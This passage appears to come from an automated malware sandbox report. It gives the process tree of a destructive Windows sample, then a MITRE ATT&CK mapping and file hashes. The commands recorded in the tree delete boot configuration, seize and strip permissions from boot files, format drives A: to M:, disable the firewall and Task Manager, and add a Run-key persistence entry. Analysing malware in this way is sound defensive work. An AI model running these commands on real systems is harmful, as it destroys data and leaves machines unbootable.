        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\7253.tmp\7254.tmp\7255.bat C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe"
        6⤵
        
        PID:11556
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:11596
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        7⤵
        
        PID:2972
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        7⤵
        
        PID:12816
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        7⤵
        
        PID:13100
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        7⤵
        Possible privilege escalation attempt
        
        PID:11856
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        7⤵
        Possible privilege escalation attempt
        
        PID:6968
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        7⤵
        
        PID:12808
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        7⤵
        Modifies file permissions
        
        PID:13440
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        7⤵
        Modifies file permissions
        
        PID:13656
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        7⤵
        
        PID:13732
        
        C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        7⤵
        
        PID:13920
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        7⤵
        
        PID:13956
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:5960
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:5992
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:6008
    - - C:\Windows\system32\mspaint.exe
        
        mspaint
        5⤵
        
        PID:6028
    - - C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        5⤵
        
        PID:6048
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\76D5.tmp\76D6.tmp\76D7.bat C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe"
        6⤵
        
        PID:11680
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:11752
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:10552
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        7⤵
        Modifies file permissions
        
        PID:12904
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        7⤵
        Views/modifies file attributes
        
        PID:13168
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:12332
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        7⤵
        
        PID:12396
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        7⤵
        Views/modifies file attributes
        
        PID:8832
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        7⤵
        
        PID:13468
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        7⤵
        Modifies file permissions
        
        PID:13688
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        7⤵
        
        PID:13784
        
        C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        7⤵
        
        PID:14008
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:6072
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:6104
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:6116
    - - C:\Windows\system32\mspaint.exe
        
        mspaint
        5⤵
        
        PID:6140
    - - C:\Windows\system32\format.com
        
        format /y /q A:
        5⤵
        
        PID:5392
    - - C:\Windows\system32\format.com
        
        format /y /q B:
        5⤵
        
        PID:6368
    - - C:\Windows\system32\format.com
        
        format /y /q D:
        5⤵
        
        PID:6732
    - - C:\Windows\system32\format.com
        
        format /y /q E:
        5⤵
        
        PID:7004
    - - C:\Windows\system32\format.com
        
        format /y /q F:
        5⤵
        
        PID:5580
    - - C:\Windows\system32\format.com
        
        format /y /q G:
        5⤵
        
        PID:5692
    - - C:\Windows\system32\format.com
        
        format /y /q H:
        5⤵
        
        PID:7096
    - - C:\Windows\system32\format.com
        
        format /y /q I:
        5⤵
        
        PID:9160
    - - C:\Windows\system32\format.com
        
        format /y /q J:
        5⤵
        
        PID:11176
    - - C:\Windows\system32\format.com
        
        format /y /q K:
        5⤵
        
        PID:11864
    - - C:\Windows\system32\format.com
        
        format /y /q L:
        5⤵
        
        PID:13264
    - - C:\Windows\system32\format.com
        
        format /y /q M:
        5⤵
        
        PID:13428
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\VBICodec.ax"
        5⤵
        Modifies file permissions
        
        PID:13884
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:1836
- - C:\Windows\system32\notepad.exe
    notepad
    3⤵
    PID:2784
- - C:\Windows\system32\calc.exe
    calc
    3⤵
    PID:2196
- - C:\Windows\system32\mspaint.exe
    mspaint
    3⤵
    - Drops file in Windows directory
    - Suspicious use of SetWindowsHookEx
    PID:3008
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:300
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
    3⤵
    PID:2224
- - C:\Windows\system32\reg.exe
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:1848
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
    3⤵
    PID:2980
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:2016
- - C:\Windows\system32\netsh.exe
    netsh advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:1084
- - C:\Windows\system32\bcdedit.exe
    bcdedit /delete {current}
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:760
- - C:\Windows\system32\msg.exe
    msg * Virus detectado
    3⤵
    PID:1876
- - C:\Windows\system32\msg.exe
    msg * Virus detectado
    3⤵
    PID:1232
- - C:\Windows\system32\msg.exe
    msg * Has sido hackeado!
    3⤵
    PID:2428
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\drivers" /r
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2920
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\drivers" /reset /t /c /q
    3⤵
    PID:4312
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\System32\drivers\*.*"
    3⤵
    - Drops file in Drivers directory
    PID:4336
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:4408
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:4416
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:4424
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:4440
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:4448
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:4456
- - C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
    C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:4464
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\CE37.tmp\CE38.tmp\CE39.bat C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe"
      4⤵
      PID:5532
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        5⤵
        
        PID:4180
      - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        6⤵
        
        PID:13052
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        5⤵
        Modifies file permissions
        
        PID:4312
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        5⤵
        Modifies file permissions
        
        PID:6416
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        5⤵
        
        PID:6484
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        5⤵
        
        PID:6696
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        5⤵
        Possible privilege escalation attempt
        
        PID:6804
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        5⤵
        Views/modifies file attributes
        
        PID:6860
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        5⤵
        
        PID:6992
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        5⤵
        Possible privilege escalation attempt
        
        PID:7140
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        5⤵
        Views/modifies file attributes
        
        PID:6184
    - - C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        5⤵
        
        PID:5484
    - - C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        5⤵
        
        PID:3716
    - - C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SwapMouseButton
        5⤵
        
        PID:8832
    - - C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        5⤵
        Gathers network information
        
        PID:13156
    - - C:\Windows\system32\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v EthernetKill /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd" /f
        5⤵
        
        PID:9032
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        5⤵
        
        PID:13412
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:13648
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:13908
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:13928
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:13964
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:13980
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:14016
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:4476
- - C:\Windows\system32\notepad.exe
    notepad
    3⤵
    PID:4492
- - C:\Windows\system32\calc.exe
    calc
    3⤵
    PID:4500
- - C:\Windows\system32\mspaint.exe
    mspaint
    3⤵
    PID:4508
- - C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
    C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
    3⤵
    PID:4516
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\CF41.tmp\CF42.tmp\CF43.bat C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe"
      4⤵
      PID:5736
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        5⤵
        
        PID:6208
      - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        6⤵
        Modifies file permissions
        
        PID:11176
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        5⤵
        
        PID:6216
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        5⤵
        
        PID:6448
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        5⤵
        
        PID:6504
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        5⤵
        
        PID:6724
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        5⤵
        Possible privilege escalation attempt
        
        PID:6820
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        5⤵
        
        PID:6880
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        5⤵
        Modifies file permissions
        
        PID:7032
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        5⤵
        Modifies file permissions
        
        PID:6160
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        5⤵
        
        PID:4840
    - - C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        5⤵
        
        PID:5792
    - - C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        5⤵
        
        PID:5944
    - - C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SwapMouseButton
        5⤵
        
        PID:9028
    - - C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        5⤵
        Gathers network information
        
        PID:13252
    - - C:\Windows\system32\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v EthernetKill /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd" /f
        5⤵
        
        PID:8012
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        5⤵
        
        PID:13460
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:13708
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:13972
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:14000
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:4524
- - C:\Windows\system32\notepad.exe
    notepad
    3⤵
    PID:4540
- - C:\Windows\system32\calc.exe
    calc
    3⤵
    PID:4548
- - C:\Windows\system32\mspaint.exe
    mspaint
    3⤵
    PID:4556
- - C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
    C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
    3⤵
    PID:4564
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\D079.tmp\D07A.tmp\D07B.bat C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe"
      4⤵
      PID:5196
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        5⤵
        
        PID:6324
      - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        6⤵
        
        PID:12540
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        5⤵
        
        PID:6332
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        5⤵
        
        PID:6512
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        5⤵
        Views/modifies file attributes
        
        PID:6596
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        5⤵
        Possible privilege escalation attempt
        
        PID:6768
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        5⤵
        
        PID:6888
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        5⤵
        Views/modifies file attributes
        
        PID:6916
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        5⤵
        
        PID:7072
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        5⤵
        
        PID:6252
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        5⤵
        
        PID:6284
    - - C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        5⤵
        
        PID:6352
    - - C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        5⤵
        
        PID:6448
    - - C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SwapMouseButton
        5⤵
        
        PID:8012
    - - C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        5⤵
        Gathers network information
        
        PID:10640
    - - C:\Windows\system32\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v EthernetKill /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd" /f
        5⤵
        
        PID:13080
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        5⤵
        
        PID:13532
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:13776
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:4576
- - C:\Windows\system32\notepad.exe
    notepad
    3⤵
    PID:4592
- - C:\Windows\system32\calc.exe
    calc
    3⤵
    PID:4600
- - C:\Windows\system32\mspaint.exe
    mspaint
    3⤵
    PID:4612
- - C:\Windows\system32\format.com
    format /y /q A:
    3⤵
    PID:4684
- - C:\Windows\system32\format.com
    format /y /q B:
    3⤵
    PID:4772
- - C:\Windows\system32\format.com
    format /y /q D:
    3⤵
    PID:4832
- - C:\Windows\system32\format.com
    format /y /q E:
    3⤵
    PID:4904
- - C:\Windows\system32\format.com
    format /y /q F:
    3⤵
    PID:1048
- - C:\Windows\system32\format.com
    format /y /q G:
    3⤵
    PID:4436
- - C:\Windows\system32\format.com
    format /y /q H:
    3⤵
    PID:3712
- - C:\Windows\system32\format.com
    format /y /q I:
    3⤵
    PID:2356
- - C:\Windows\system32\format.com
    format /y /q J:
    3⤵
    PID:4432
- - C:\Windows\system32\format.com
    format /y /q K:
    3⤵
    PID:5112
- - C:\Windows\system32\format.com
    format /y /q L:
    3⤵
    PID:3856
- - C:\Windows\system32\format.com
    format /y /q M:
    3⤵
    PID:5232
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\bdaplgin.ax"
    3⤵
    PID:5484
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\bdaplgin.ax" /reset /c /q
    3⤵
    - Possible privilege escalation attempt
    PID:5656
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\System32\bdaplgin.ax"
    3⤵
    - Views/modifies file attributes
    PID:5732
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\g711codc.ax"
    3⤵
    PID:6088
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\g711codc.ax" /reset /c /q
    3⤵
    PID:4180
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\System32\g711codc.ax"
    3⤵
    PID:5300
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\ksproxy.ax"
    3⤵
    PID:6348
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\ksproxy.ax" /reset /c /q
    3⤵
    PID:6496
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\System32\ksproxy.ax"
    3⤵
    PID:6544
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\kstvtune.ax"
    3⤵
    - Possible privilege escalation attempt
    PID:6836
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\kstvtune.ax" /reset /c /q
    3⤵
    PID:6976
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\System32\kstvtune.ax"
    3⤵
    - Views/modifies file attributes
    PID:7044
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\Kswdmcap.ax"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:6168
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\Kswdmcap.ax" /reset /c /q
    3⤵
    PID:3984
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\System32\Kswdmcap.ax"
    3⤵
    - Views/modifies file attributes
    PID:5856
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\ksxbar.ax"
    3⤵
    PID:5544
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\ksxbar.ax" /reset /c /q
    3⤵
    - Modifies file permissions
    PID:6808
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\System32\ksxbar.ax"
    3⤵
    PID:6020
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\Mpeg2Data.ax"
    3⤵
    PID:4152
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\Mpeg2Data.ax" /reset /c /q
    3⤵
    PID:7560
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\System32\Mpeg2Data.ax"
    3⤵
    PID:7916
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\mpg2splt.ax"
    3⤵
    PID:8464
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\mpg2splt.ax" /reset /c /q
    3⤵
    - Possible privilege escalation attempt
    PID:9108
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\System32\mpg2splt.ax"
    3⤵
    PID:9656
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\MSDvbNP.ax"
    3⤵
    - Possible privilege escalation attempt
    PID:10920
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\MSDvbNP.ax" /reset /c /q
    3⤵
    PID:11416
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\System32\MSDvbNP.ax"
    3⤵
    - Views/modifies file attributes
    PID:11648
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\MSNP.ax"
    3⤵
    - Modifies file permissions
    PID:11956
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\MSNP.ax" /reset /c /q
    3⤵
    PID:12572
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\System32\MSNP.ax"
    3⤵
    PID:12896
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\psisrndr.ax"
    3⤵
    PID:5900
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\psisrndr.ax" /reset /c /q
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:12816
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\System32\psisrndr.ax"
    3⤵
    PID:12796
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\VBICodec.ax"
    3⤵
    - Modifies file permissions
    PID:13356
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\VBICodec.ax" /reset /c /q
    3⤵
    - Modifies file permissions
    PID:13584
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\System32\VBICodec.ax"
    3⤵
    PID:13676
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\vbisurf.ax"
    3⤵
    PID:13892

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "139095646816274818481217111147-383661171-871860025-149447193779002341-2028654320"
1⤵
PID:1084

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1687935769-384425067-21996427-1339477424-1197797154-2055060692-193534062-493373653"
1⤵
PID:2992

C:\Windows\system32\wbem\WMIADAP.EXE
wmiadap.exe /F /T
1⤵
PID:6932

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-969826756-10298327391261677313-1800688330-876866271-525142889-11290557601068960518"
1⤵
PID:3800

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Replication Through Removable Media

T1091

Execution

Command and Scripting Interpreter

T1059

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Pre-OS Boot

T1542

Bootkit

T1542.003

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Deobfuscate/Decode Files or Information

T1140

File and Directory Permissions Modification

T1222

Windows File and Directory Permissions Modification

T1222.001

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Pre-OS Boot

T1542

Bootkit

T1542.003

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Replication Through Removable Media

T1091

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe

Filesize
112KB

MD5
81a7a946456f1f6dae4715b1feb72ed0

SHA1
af83b938017efd53f95671adc0c6d2aa1088d38e

SHA256
690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408

SHA512
a1ec5c6b1ebb014aa60d0242e147ebbbadd2aff2a0e653b99f440f8d25bb01ee49cddcf6ad608c0adc8a5efc784ff2c949036b447da2912ccc6e684c2cc0e692

Download Submit
C:\Users\Admin\AppData\Local\Temp\8391.tmp\8392.tmp\8393.bat

Filesize
23KB

MD5
afb3843724a58bbbb53fd12a8f42d8e6

SHA1
0835bbceeb20027752c05e48b1b7c4571611f32f

SHA256
53f749148a1e78cf315f16934350a13113705b95d2a375573c7007dfeaba047d

SHA512
8c8ba2b13e6fc63ddb7205ef223a2cf954fdcc8737ee031533d916535df401581dad3c3bd53416340e12569d9ad505051a63edc4f77905dbd96f94eadef84fad

Download Submit
C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs

Filesize
63B

MD5
4cb4efde0d2476b32d5a347a52df6c1b

SHA1
d2b3d042dfc64cc15b41b83b6f0252497a515e95

SHA256
1db6458800616839e864831147cc6d91845825e365925151f649b5d998152273

SHA512
1a676aec628275f5812bc99f7055713986579304df42328559b7a0adeb99601a2a680144a0f3b1685a0126c034cbf9f75ac89cb5cd1c8ca87f7e68824771ebce

Download Submit
C:\Users\Admin\AppData\Local\Temp\Autorun.inf

Filesize
74B

MD5
b39df423c6e5978065a9a8ec4879a3b4

SHA1
96441a7a7d8090f7a96a1160f539531f66568e88

SHA256
12a5135510016abcfe1192aceb6fec42634346661d778d68be1debaa3d75e967

SHA512
2d583fcae1ec73f836c5b66b8b1337bb4250a8230073de96d501a4fab5f522b75599ac2a1fcf1457a841d8c84bcccb88feade82f49357b28345c63d9526cfeb4

Download Submit
C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs

Filesize
57B

MD5
5420b2137427b07b4d6a585ae3b69e08

SHA1
feb511d0b40064ab8a491caf699f5959bc9d4716

SHA256
ae3ab245b4001b487205480988a1aa775de104faf0e5d9c43dd3d1cf285196a1

SHA512
